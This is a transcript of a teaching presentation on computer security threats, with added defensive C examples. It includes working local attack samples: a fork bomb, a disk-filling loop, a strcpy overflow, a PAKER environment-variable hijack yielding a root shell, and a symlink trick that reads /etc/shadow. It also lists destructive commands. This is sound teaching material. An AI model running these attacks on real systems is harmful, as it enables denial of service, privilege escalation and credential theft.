Security Threats and Intruders: Types and Classifications


Explore the various known break-in methods, risk factors, intruder types such as hackers, spies, terrorists, corporate raiders, vandals, and voyeurs. Learn about the classification of security threats based on external and internal attacks, intentional vs. unintentional attacks, and active vs. passive interference in computer systems.

  • Security Threats
  • Intruders
  • Break-in Methods
  • Risk Factors
  • Classification




Presentation Transcript


  1. Known break-in methods: prototypes of methods and interventions in the system; active and passive interference.

  2. Risk = Weak Points + Threat. Weak point: a possible entry point (gate) for an attack. Threat: an action or event that may violate the security of the information system environment. Elements of a threat: Targets (the aspect of security that can be attacked), Perpetrators (the people or companies from which the threat emerges), Events (the types of activity that create a threat).

  3. Intruders. Hacker: an attacker who breaches security purely to prove and validate his technical skills. Spy: an attacker who obtains information that can be used in political matters. Terrorist: an attacker who tries to create a threat for political gain.

  4. Intruders (cont.). Corporate raider: an attacker, often an employee, engaging in illegal activities against competitors for financial gain. Professional criminal: attacks computers for personal financial gain.

  5. Intruders (cont.). Vandal: an attacker whose aim is destruction. Voyeur: an attacker motivated by the thrill (the feeling of fear) that comes with obtaining sensitive information.

  6. Classification of security threats. Division by the place from which an attack is carried out: External: an attack carried out from a system outside the target network. Internal: an attack launched from a system on the target network.

  7. Classification of security threats (cont.). Division by intent: Intentional: the attacker is aware of what he is doing. Unintentional: the attacker attacks accidentally.

  8. Classification of security threats (cont.). Division by the effect of the attack: Active: as a result of the attack the computer system loses its integrity. Passive: an attack consisting of entering the system without making any changes.

  9. Hacker motivations: challenge, greed, malicious intent.

  10. Attack anatomy: security reconnaissance (security enumeration, gathering information); security breach (taking control, intrusion); exiting the system (settling in, covering traces).

  11. Security attacks: normal flow, interruption, covering traces, interception, falsification.

  12. Scanning. Scanning network addresses: probing successive IP addresses from the assumed range in order to select a victim or learn the topology of the attacked network. Scanning network ports: probing successive ports of a computer system in order to obtain information about open ports and the services provided on them.

  13. Half-open scanning

  14. Reset scan. The hacker sends a TCP RST packet to an existing system; the existing system does not respond. The hacker sends a TCP RST to a nonexistent address; the router answers with an ICMP Host Unreachable message. The difference in responses reveals which target addresses are in use.
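Slides 12 to 14 describe scanning from the attacker's side; the defender's side is spotting it in connection logs. The C program below is an added example and is not part of the original presentation. It parses a constructed (made-up) SYN log in the assumed format "epoch_seconds source_ip destination_ip destination_port" and flags any source that touches at least a configurable number of distinct destination ports within a time window. The log format, thresholds, addresses and function names are assumptions for illustration; a production detector would use a sliding window and per-destination state rather than the single first-to-last span used here.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample log (not real data): one line per inbound TCP SYN,
 * "epoch_seconds source_ip destination_ip destination_port". */
static const char *SAMPLE_LOG[] = {
    "1700000000 198.51.100.7 192.0.2.10 22",
    "1700000000 198.51.100.7 192.0.2.10 23",
    "1700000001 198.51.100.7 192.0.2.10 25",
    "1700000001 203.0.113.5 192.0.2.10 443",
    "1700000001 198.51.100.7 192.0.2.10 80",
    "1700000002 198.51.100.7 192.0.2.10 110",
    "1700000002 203.0.113.5 192.0.2.10 443",
    "1700000003 198.51.100.7 192.0.2.10 143",
    "1700000004 198.51.100.7 192.0.2.10 443",
    "1700000005 198.51.100.7 192.0.2.10 8080",
    NULL
};

#define MAX_SOURCES 64
#define MAX_PORTS   256   /* distinct ports remembered per source */

struct source_stat {
    char ip[40];
    long first_ts, last_ts;   /* time span covered by this source's probes */
    int  ports[MAX_PORTS];
    int  nports;
};

static struct source_stat stats[MAX_SOURCES];
static int nstats;

static struct source_stat *find_source(const char *ip) {
    for (int i = 0; i < nstats; i++)
        if (strcmp(stats[i].ip, ip) == 0) return &stats[i];
    return NULL;
}

/* Parse one log line and update the per-source table.
 * Returns 0 on success, -1 when the line does not match the format. */
int ingest_line(const char *line) {
    long ts; char src[40], dst[40]; int port;
    if (sscanf(line, "%ld %39s %39s %d", &ts, src, dst, &port) != 4) return -1;
    struct source_stat *s = find_source(src);
    if (s == NULL) {
        if (nstats == MAX_SOURCES) return -1;
        s = &stats[nstats++];
        memset(s, 0, sizeof *s);
        strcpy(s->ip, src);            /* src is at most 39 chars; ip holds 40 */
        s->first_ts = ts;
    }
    s->last_ts = ts;
    for (int i = 0; i < s->nports; i++)
        if (s->ports[i] == port) return 0;   /* port already counted */
    if (s->nports < MAX_PORTS) s->ports[s->nports++] = port;
    return 0;
}

/* Distinct destination ports probed by `ip`, or -1 if the source is unknown. */
int distinct_ports(const char *ip) {
    struct source_stat *s = find_source(ip);
    return s ? s->nports : -1;
}

/* Heuristic: a source that touches at least `min_ports` distinct ports
 * within `window_secs` seconds is treated as a port scanner. */
int is_scanner(const char *ip, int min_ports, long window_secs) {
    struct source_stat *s = find_source(ip);
    if (s == NULL) return 0;
    return s->nports >= min_ports && (s->last_ts - s->first_ts) <= window_secs;
}

/* Reset the table, feed the whole sample, print and return the number of
 * sources flagged under the given thresholds. */
int run_sample(int min_ports, long window_secs) {
    int flagged = 0;
    nstats = 0;
    for (int i = 0; SAMPLE_LOG[i] != NULL; i++) ingest_line(SAMPLE_LOG[i]);
    for (int i = 0; i < nstats; i++) {
        if (is_scanner(stats[i].ip, min_ports, window_secs)) {
            printf("possible port scan from %s: %d ports in %ld s\n",
                   stats[i].ip, stats[i].nports, stats[i].last_ts - stats[i].first_ts);
            flagged++;
        }
    }
    return flagged;
}

int main(void) {
    run_sample(5, 10);
    return 0;
}
```

With the sample above, 198.51.100.7 touches eight distinct ports in five seconds and is flagged, while 203.0.113.5 repeatedly connecting to port 443 is not. Half-open (SYN-only) scans are caught by the same logic as long as the log records SYNs that never complete the handshake.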

  15. Crafted TCP/UDP packets: timed-out packet fragmentation, invalid IP header length, invalid IP field values, ICMP Address Mask Request (type 17), ICMP Timestamp Request (type 13).

  16. Identification of the operating system. Techniques for identifying the type of operating system are based on analyzing the TCP/IP protocol stack, which is implemented differently by different system vendors.

  17. Destructive attacks: formatting the hard disk partition or running newfs/mkfs; removing critical files (e.g. files from /dev, or /etc/passwd); powering off the computer; cutting network cables.

  18. DoS. A group of attacks aimed at causing a failure or overload of a host or service on the network.

  19. Smurf attack. The hacker sends an ICMP Echo Request packet to the broadcast address of a large network, with a spoofed source address claiming to be the target system. ICMP Echo Reply messages from every system on that large network then flood the target system.

  20. Distributed DoS. The hacker sends commands to the master to start the attack; the master sends commands to the slaves to start the attack; the slaves launch the attack and paralyze the target.

  21. Process congestion attack. A user contributes to blocking a system on which other users are also active. Sample code:

        #include <unistd.h>

        int main(void) { while (1) fork(); }

      Modes of operation: 1) kill -TERM 1; 2) exec /bin/su; password: ******

  22. Disk attacks. Disk full. Attack on the directory structure:

        while mkdir ./another_directory; do
            cd ./another_directory
            cp /bin/cc fill_it_up
        done

      The problem with swap space; the problem with /tmp; problems with i-nodes.
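One control that bounds the "disk full" attack on a per-process basis is the RLIMIT_FSIZE resource limit (what ulimit -f sets), which makes the kernel refuse any write that would grow a file past the cap. The C program below is an added example and is not part of the original presentation: it lowers the soft limit to a chosen cap, writes past it into a scratch file under /tmp, and reports how many bytes the kernel accepted. The cap values, the scratch path and the chunk size are assumptions for illustration; filesystem quotas and a separate /tmp filesystem, which the slide alludes to, are the broader fixes for the swap, /tmp and i-node problems.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write `total` bytes to `fd` in `chunk`-byte pieces and return how many the
 * kernel accepted; stops at the first write that fails (EFBIG once the
 * per-process file-size cap is reached). */
static long fill_until_refused(int fd, long total, long chunk) {
    char buf[512];
    long written = 0;
    memset(buf, 'x', sizeof buf);
    if (chunk > (long)sizeof buf) chunk = sizeof buf;
    while (written < total) {
        long want = (total - written < chunk) ? total - written : chunk;
        ssize_t n = write(fd, buf, (size_t)want);
        if (n <= 0) break;
        written += n;
    }
    return written;
}

/* Cap this process's maximum file size at `cap_bytes` (the soft RLIMIT_FSIZE),
 * try to write `attempt_bytes` to a scratch file under /tmp, and return how
 * many bytes actually landed. Returns -1 on setup failure. The previous soft
 * limit is restored before returning. */
long demo_file_size_cap(long cap_bytes, long attempt_bytes) {
    struct rlimit old, lim;
    char path[64];
    int fd;
    long written;

    if (getrlimit(RLIMIT_FSIZE, &old) != 0) return -1;
    /* Exceeding RLIMIT_FSIZE normally delivers SIGXFSZ, which terminates the
     * process; ignoring it makes write() return -1 with errno EFBIG instead. */
    signal(SIGXFSZ, SIG_IGN);

    snprintf(path, sizeof path, "/tmp/fsize_demo_%ld", (long)getpid());
    fd = open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    unlink(path);                     /* scratch file disappears when fd is closed */

    lim.rlim_cur = (rlim_t)cap_bytes;
    lim.rlim_max = old.rlim_max;
    if (setrlimit(RLIMIT_FSIZE, &lim) != 0) { close(fd); return -1; }

    written = fill_until_refused(fd, attempt_bytes, 512);

    setrlimit(RLIMIT_FSIZE, &old);    /* soft limit may be raised back up to the hard limit */
    close(fd);
    return written;
}

int main(void) {
    long got = demo_file_size_cap(4096, 16384);
    printf("cap 4096 bytes: %ld of 16384 requested bytes were written\n", got);
    return 0;
}
```

The fill loop stops exactly at the cap: with a 4096-byte limit the ninth 512-byte write fails with EFBIG and 4096 bytes remain on disk. The limit is inherited by child processes, so setting it in a login session (or in /etc/security/limits.conf) also bounds the copy loop from the slide.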

  23. Buffer overflow attack. A buffer overflow occurs when a value that takes up more memory than was allocated for a variable is written into that variable.

        #include <string.h>

        void problem_function(char *big_string) {
            char small_string[8];
            strcpy(small_string, big_string);   /* unbounded copy: 63 bytes land in an 8-byte buffer */
        }

        int main(void) {
            char big_string[64];
            int i;
            for (i = 0; i < 63; i++)
                big_string[i] = 'a';
            big_string[63] = '\0';              /* terminate so strcpy stops after 63 bytes */
            problem_function(big_string);
            return 0;
        }
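The defect on the slide is that strcpy() knows nothing about the size of small_string. The C code below is an added example, not part of the original presentation: it keeps the slide's vulnerable function for comparison and places a bounded copy beside it, in which the destination size travels with the pointer and an oversized source is refused rather than written past the end of the buffer. The function names bounded_copy and demo_oversized_input are assumptions for this example.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable form from the slide, kept for comparison: strcpy() copies until
 * the NUL byte of the source, regardless of the destination's size. */
void problem_function_unsafe(char *big_string) {
    char small_string[8];
    strcpy(small_string, big_string);   /* writes past small_string for inputs of 8+ bytes */
    (void)small_string;
}

/* Hardened form: the caller passes the destination size and the copy is
 * bounded. Returns 0 on success, -1 if the source (plus its NUL) does not
 * fit; in that case nothing is copied and dst is left as an empty string. */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || src == NULL || dst_size == 0) return -1;
    size_t len = strlen(src);
    if (len >= dst_size) {              /* no room for the string plus its NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);          /* copy exactly len bytes plus the terminator */
    return 0;
}

/* Same input as the slide: 63 'a' bytes aimed at an 8-byte buffer. With the
 * bounded copy the call is refused instead of smashing the stack.
 * Returns 1 if the copy was refused, 0 if it went through. */
int demo_oversized_input(void) {
    char big_string[64];
    char small_string[8];
    memset(big_string, 'a', 63);
    big_string[63] = '\0';
    return bounded_copy(small_string, sizeof small_string, big_string) == -1;
}

int main(void) {
    char small[8];
    printf("short input accepted (0 = ok): %d\n", bounded_copy(small, sizeof small, "abc"));
    printf("oversized input refused (1 = yes): %d\n", demo_oversized_input());
    return 0;
}
```

The refusal is explicit so the caller can report the bad input; silently truncating (as strncpy() does, and without guaranteeing a terminator) would hide the problem and can itself produce an unterminated string.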

  24. Attacks overwriting system (environment) variables. Where the attacked program allows the buffer to be overwritten but the buffer is so small that the bytes needed to invoke a shell will not fit, the attacker can instead try to place that code in one of the environment variables.

  25. Attacks using system (environment) variables. Program example (the identifiers are Polish: pakuj = "pack", PAKER = "packer", dane = "data"):

        #include <stdlib.h>
        #include <string.h>

        int main(void) {
            char *pakuj;
            if ((pakuj = getenv("PAKER")) != NULL) {
                strcat(pakuj, " dane");       /* appends the file name to the attacker-controlled packer path */
                system(pakuj);                /* and hands the result to a shell */
            } else {
                system("/bin/gzip dane");
            }
            return 0;
        }

      Command line:

        $ ls -lga /usr/bin/example
        $ PAKER=./sh
        $ export PAKER
        $ cat ./sh
        $ example
        bash#
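The root cause on the slide is that a privileged program lets the caller's environment choose which program runs and then passes the result to a shell. The C code below is an added example and is not the presentation's code: it maps the untrusted PAKER request onto an allow-list of absolute packer paths (the list /bin/gzip and /usr/bin/bzip2 is an assumption for this example), validates the file name, and runs the packer with execve() on a fixed minimal environment instead of system(). The names choose_packer, filename_is_safe and run_packer are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list of packers (assumed set for this example). Only these absolute
 * paths are ever executed, whatever $PAKER says. */
static const char *const ALLOWED_PACKERS[] = { "/bin/gzip", "/usr/bin/bzip2", NULL };

/* Map the untrusted $PAKER request onto an allowed packer. A missing,
 * relative or unknown value falls back to the default, so a planted "./sh"
 * is never executed. */
const char *choose_packer(const char *requested) {
    if (requested == NULL || requested[0] != '/') return ALLOWED_PACKERS[0];
    for (int i = 0; ALLOWED_PACKERS[i] != NULL; i++)
        if (strcmp(requested, ALLOWED_PACKERS[i]) == 0) return ALLOWED_PACKERS[i];
    return ALLOWED_PACKERS[0];
}

/* Accept only plain file names: no path separators, no shell metacharacters,
 * and no leading '-' that the packer could read as an option. */
int filename_is_safe(const char *name) {
    if (name == NULL || name[0] == '\0' || name[0] == '-') return 0;
    for (const char *p = name; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Hardened replacement for system(pakuj): no shell is involved, the program
 * path comes from the allow-list, the argument is validated, and the child
 * gets a minimal fixed environment. Returns the child's exit status, or -1. */
int run_packer(const char *file) {
    const char *packer = choose_packer(getenv("PAKER"));
    if (!filename_is_safe(file)) return -1;
    char *const child_argv[] = { (char *)packer, (char *)file, NULL };
    char *const child_envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(packer, child_argv, child_envp);
        _exit(127);                    /* only reached if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv) {
    const char *file = argc > 1 ? argv[1] : "dane";   /* "dane" = "data", as on the slide */
    printf("using packer %s\n", choose_packer(getenv("PAKER")));
    return run_packer(file) == 0 ? 0 : 1;
}
```

Note that the original strcat() onto the getenv() result is also a memory-safety bug in its own right: it writes past the end of the environment string. Building an argument vector, as above, removes both the shell and that write.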

  26. Symbolic link attacks. Business card program (wizytówka = "business card"):

        #include <stdlib.h>

        int main(void) {
            system("/bin/cat $HOME/.wizytówka.cfg");   /* trusts whatever sits at that path, link or not */
            return 0;
        }

      Command line:

        $ ln -s -f /etc/shadow ./.wizytówka.cfg
        $ wizytówka
        root:L7Zfwf455:10165:-1:-1:-1:-1:-1:-1
        ...............
        hacker:/ffW4Gger:10209:-1:-1:-1:-1:-1:-1
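The privileged program on the slide reads whatever the user-controlled path resolves to. The C code below is an added example and not the presentation's code: it opens the per-user config with O_NOFOLLOW so a planted symlink is refused with ELOOP, then checks on the already-open descriptor that the file is a regular file owned by the caller with a single link (so a hard link to a protected file is refused as well). The demonstration builds its own scratch directory under /tmp with a stand-in "secret" file; the paths and the names open_user_config and demo_symlink_refused are assumptions for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a per-user config file without following symlinks and reject anything
 * that is not a regular file owned by the caller with a single link.
 * Returns an fd, or -1 with errno set (ELOOP when `path` is a symlink,
 * EPERM when the ownership/type checks fail). */
int open_user_config(const char *path) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;              /* ELOOP: a planted symbolic link */
    if (fstat(fd, &st) != 0) { close(fd); return -1; }
    if (!S_ISREG(st.st_mode) || st.st_uid != getuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;                  /* wrong owner, not a plain file, or hard-linked */
        return -1;
    }
    return fd;                          /* checks were made on this very fd, so no race */
}

static int write_text_file(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Self-contained check in a private scratch directory under /tmp: a real
 * config file is accepted, while a symlink planted at the config path
 * (pointing at a stand-in for /etc/shadow) is refused with ELOOP.
 * Returns 1 when both hold, 0 when they do not, -1 on setup failure. */
int demo_symlink_refused(void) {
    char dir[64], real[128], link[128], target[128];
    int result = -1, fd_ok = -1, fd_bad = -1, bad_errno = 0;

    snprintf(dir, sizeof dir, "/tmp/cfgdemo_%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) return -1;
    snprintf(real, sizeof real, "%s/real.cfg", dir);
    snprintf(link, sizeof link, "%s/.card.cfg", dir);      /* the attacked config path */
    snprintf(target, sizeof target, "%s/secret", dir);     /* constructed stand-in for /etc/shadow */

    if (write_text_file(real, "greeting=hello\n") == 0 &&
        write_text_file(target, "root:not-a-real-hash:0:0\n") == 0 &&
        symlink(target, link) == 0) {
        fd_ok = open_user_config(real);
        fd_bad = open_user_config(link);
        bad_errno = errno;
        result = (fd_ok >= 0 && fd_bad < 0 && bad_errno == ELOOP);
    }
    if (fd_ok >= 0) close(fd_ok);
    unlink(real); unlink(link); unlink(target); rmdir(dir);
    return result;
}

int main(void) {
    printf("symlink at config path refused (1 = yes): %d\n", demo_symlink_refused());
    return 0;
}
```

Reading through the returned descriptor (rather than reopening the path, or handing it to /bin/cat via a shell) is what closes the window: the path is resolved once, and every check is made on the object that was actually opened.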

  27. Email bombers. A group of programs that are also used for DoS attacks. The algorithm is simple but very effective: it consists of sending as many copies of the same message as possible to the same recipient.

  28. Trojan horses and viruses. Trojan horses allow remote control of the target computer; programs of this type are dangerous because they can perform operations on a computer inside a protected network (e.g. BackOrifice2000). Viruses are self-replicating programs that can damage hardware, data and systems, open the door for an intruder, etc.

  29. Social engineering Social engineering is the use of non-technical means to obtain unauthorized access to information or systems. It takes advantage of the weakness of the human factor.

  30. Other attacks: command-channel attacks, data-driven attacks, third-party attacks, false authentication.
